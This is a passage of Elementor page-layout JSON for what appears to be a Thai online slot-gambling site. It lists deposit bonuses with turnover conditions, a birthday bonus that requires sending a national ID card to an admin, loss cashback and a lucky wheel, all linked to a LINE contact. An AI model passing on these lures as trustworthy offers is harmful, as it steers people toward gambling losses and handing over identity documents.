fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"49fe62a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"fc4dc04\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"4e0d99f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"20cbe32\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"696\\\" data-end=\\\"711\\\">\\u0e04\\u0e38\\u0e49\\u0e21\\u0e2a\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e49\\u0e07<\\/strong> \\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19<\\/p><ul><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"743\\\" data-end=\\\"758\\\">100 \\u0e23\\u0e31\\u0e1a 200<\\/strong><\\/li><li data-start=\\\"696\\\" data-end=\\\"740\\\"><strong data-start=\\\"763\\\" data-end=\\\"780\\\">500 \\u0e23\\u0e31\\u0e1a 1,000<\\/strong><\\/li><\\/ul><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"798\\\" data-end=\\\"837\\\"><strong data-start=\\\"798\\\" data-end=\\\"813\\\">\\u0e17\\u0e33 6 \\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19<\\/strong>, <strong data-start=\\\"815\\\" data-end=\\\"835\\\">\\u0e16\\u0e2d\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"848\\\" data-end=\\\"886\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e15\\u0e31\\u0e14\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 (\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a)<\\/strong> \\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e14\\u0e22\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e16\\u0e2d\\u0e19<\\/li><li data-start=\\\"798\\\" data-end=\\\"837\\\">\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c <strong data-start=\\\"945\\\" data-end=\\\"967\\\">1 \\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\/\\u0e27\\u0e31\\u0e19\\/\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"82869dd\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"174fb16\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"ae3dca7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy Birthday Bonus \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d7acfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\ud83c\\udf81 \\u0e09\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14 \\u0e23\\u0e31\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e27\\u0e31\\u0e0d\\u0e15\\u0e32\\u0e21\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e19\\u0e31\\u0e49\\u0e19 <br \\/>(\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e01\\u0e34\\u0e14)<\\/p><ul><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1480\\\" data-end=\\\"1496\\\">3,000 \\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b<\\/strong> \\u2192 <strong data-start=\\\"1499\\\" data-end=\\\"1513\\\">\\u0e23\\u0e31\\u0e1a\\u0e1f\\u0e23\\u0e35 300<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1529\\\" data-end=\\\"1542\\\">500\\u20132,999<\\/strong> \\u2192 <strong data-start=\\\"1545\\\" data-end=\\\"1555\\\">\\u0e23\\u0e31\\u0e1a 50<\\/strong><\\/li><li data-start=\\\"1469\\\" data-end=\\\"1515\\\">\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e2a\\u0e30\\u0e2a\\u0e21 <strong data-start=\\\"1571\\\" data-end=\\\"1586\\\">\\u0e44\\u0e21\\u0e48\\u0e40\\u0e01\\u0e34\\u0e19 500<\\/strong> \\u2192 <strong data-start=\\\"1589\\\" data-end=\\\"1616\\\">\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e23 \\u0e23\\u0e31\\u0e1a\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 100%<\\/strong><\\/li><\\/ul><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1634\\\" data-end=\\\"1680\\\"><strong data-start=\\\"1634\\\" data-end=\\\"1653\\\">\\u0e17\\u0e33\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 5 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong>, <strong data-start=\\\"1655\\\" data-end=\\\"1678\\\">\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14 3 \\u0e40\\u0e17\\u0e48\\u0e32<\\/strong><\\/li><li data-start=\\\"1634\\\" data-end=\\\"1680\\\">\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e42\\u0e14\\u0e22 <strong data-start=\\\"1699\\\" data-end=\\\"1727\\\">\\u0e41\\u0e08\\u0e49\\u0e07\\u0e1a\\u0e31\\u0e15\\u0e23\\u0e1b\\u0e23\\u0e30\\u0e0a\\u0e32\\u0e0a\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19<\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e97b605\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9947189\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"b558a2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"54c71af\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 10%\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"234d7b8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1088\\\" data-end=\\\"1118\\\">\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32! \\u0e23\\u0e30\\u0e1a\\u0e1a <strong data-start=\\\"1844\\\" data-end=\\\"1878\\\">\\u0e41\\u0e1b\\u0e25\\u0e07\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21 Reward 10%<\\/strong> <br \\/>\\u0e19\\u0e33\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e1b\\u0e25\\u0e38\\u0e49\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e08\\u0e30\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49 \\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e41\\u0e25\\u0e01\\u0e41\\u0e15\\u0e49\\u0e21<\\/p><p><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e04\\u0e34\\u0e14\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e1b\\u0e2d\\u0e23\\u0e4c\\u0e40\\u0e0b\\u0e47\\u0e19\\u0e15\\u0e4c\\u0e08\\u0e32\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2a\\u0e38\\u0e17\\u0e18\\u0e34 \\u0e15\\u0e32\\u0e21\\u0e23\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e33\\u0e2b\\u0e19\\u0e14<\\/li><li data-start=\\\"1936\\\" data-end=\\\"1990\\\">\\u0e41\\u0e15\\u0e49\\u0e21\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e2a\\u0e14\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e19\\u0e33\\u0e44\\u0e1b\\u0e41\\u0e25\\u0e01\\u0e15\\u0e32\\u0e21\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e25\\u0e01\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e31\\u0e49\\u0e19<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5ce39e5\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"21cd1ab\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#2C2A2AAD\",\"border_border\":\"none\",\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[{\"id\":\"6b5fc02\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lucky Wheel \\u0e01\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e42\\u0e0a\\u0e04 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a328cdd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\" data-start=\\\"1415\\\" data-end=\\\"1466\\\">\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e41\\u0e15\\u0e49\\u0e21 <strong data-start=\\\"75\\\" data-end=\\\"85\\\">Reward<\\/strong> \\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 <br \\/>\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e41\\u0e15\\u0e49\\u0e21\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e23\\u0e31\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e08\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19<\\/p><p data-start=\\\"271\\\" data-end=\\\"387\\\"><span style=\\\"text-decoration: underline;\\\"><strong data-start=\\\"371\\\" data-end=\\\"387\\\">\\u0e2a\\u0e23\\u0e38\\u0e1b\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02<\\/strong><\\/span><\\/p><ul><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"197\\\" data-end=\\\"250\\\">20 \\/ 50 \\/ 100 \\/ 150 \\/ 200 \\/ 250 \\/ 300 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a<\\/strong><\\/li><li data-start=\\\"197\\\" data-end=\\\"252\\\"><strong data-start=\\\"255\\\" data-end=\\\"275\\\">\\ud83c\\udf81 Mystery Prize<\\/strong>\\u00a0\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 (\\u0e40\\u0e0a\\u0e48\\u0e19 500 \\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15 <strong data-start=\\\"310\\\" data-end=\\\"318\\\">\\u0e2b\\u0e23\\u0e37\\u0e2d<\\/strong> \\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21 +1)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5aae432\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22\",\"selected_icon\":{\"value\":\"fas fa-gift\",\"library\":\"fa-solid\"},\"icon_align\":\"row-reverse\",\"icon_indent\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"align\":\"center\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":50,\"color\":\"rgba(0,0,0,0.3)\"},\"button_box_shadow_box_shadow_type\":\"yes\",\"button_box_shadow_box_shadow\":{\"horizontal\":2,\"vertical\":2,\"blur\":10,\"spread\":0,\"color\":\"rgba(247.980859375, 233.42967273878014, 233.42967273878014, 0.5)\"},\"border_radius\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"link\":{\"url\":\"https:\\/\\/line.me\\/R\\/ti\\/p\\/@036terdw\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d6f8124\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4ce4610\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"9e70ab2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e27\\u0e34\\u0e18\\u0e35\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e921159\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2531\\\" data-end=\\\"2570\\\">\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a \\u2192 \\u0e44\\u0e1b\\u0e17\\u0e35\\u0e48\\u0e40\\u0e21\\u0e19\\u0e39 <strong data-start=\\\"2555\\\" data-end=\\\"2568\\\">\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19<\\/strong><\\/li><li data-start=\\\"2574\\\" data-end=\\\"2643\\\">\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e14 <strong data-start=\\\"2599\\\" data-end=\\\"2614\\\">\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c<\\/strong> (\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e08\\u0e49\\u0e07\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19\\u0e15\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e38)<\\/li><li data-start=\\\"2647\\\" data-end=\\\"2706\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e02\\u0e49\\u0e32 <strong data-start=\\\"2662\\\" data-end=\\\"2675\\\">\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34<\\/strong> \\/ \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e25\\u0e31\\u0e07\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e33\\u0e40\\u0e23\\u0e47\\u0e08<\\/li><li data-start=\\\"2710\\\" data-end=\\\"2741\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e2a\\u0e16\\u0e32\\u0e19\\u0e30\\u0e44\\u0e14\\u0e49\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e27\\u0e31\\u0e15\\u0e34\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3257b34\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"076795c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"87a05f6\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9781422\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li data-start=\\\"2092\\\" data-end=\\\"2176\\\">\\u0e42\\u0e1b\\u0e23\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a <strong data-start=\\\"2109\\\" data-end=\\\"2138\\\">1 \\u0e1c\\u0e39\\u0e49\\u0e43\\u0e0a\\u0e49\\/1 \\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c\\/1 \\u0e44\\u0e2d\\u0e1e\\u0e35<\\/strong> \\u0e2b\\u0e49\\u0e32\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e17\\u0e38\\u0e08\\u0e23\\u0e34\\u0e15\\u0e17\\u0e38\\u0e01\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a<\\/li><li data-start=\\\"2179\\\" data-end=\\\"2301\\\">\\u0e01\\u0e32\\u0e23\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e16\\u0e2d\\u0e19 <strong data-start=\\\"2201\\\" data-end=\\\"2237\\\">\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e44\\u0e1b\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e02\\u0e2d\\u0e07 naijan<\\/strong> \\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 (\\u0e2b\\u0e32\\u0e01\\u0e21\\u0e35\\u0e2b\\u0e21\\u0e27\\u0e14\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e19\\u0e31\\u0e1a\\u0e40\\u0e17\\u0e34\\u0e23\\u0e4c\\u0e19 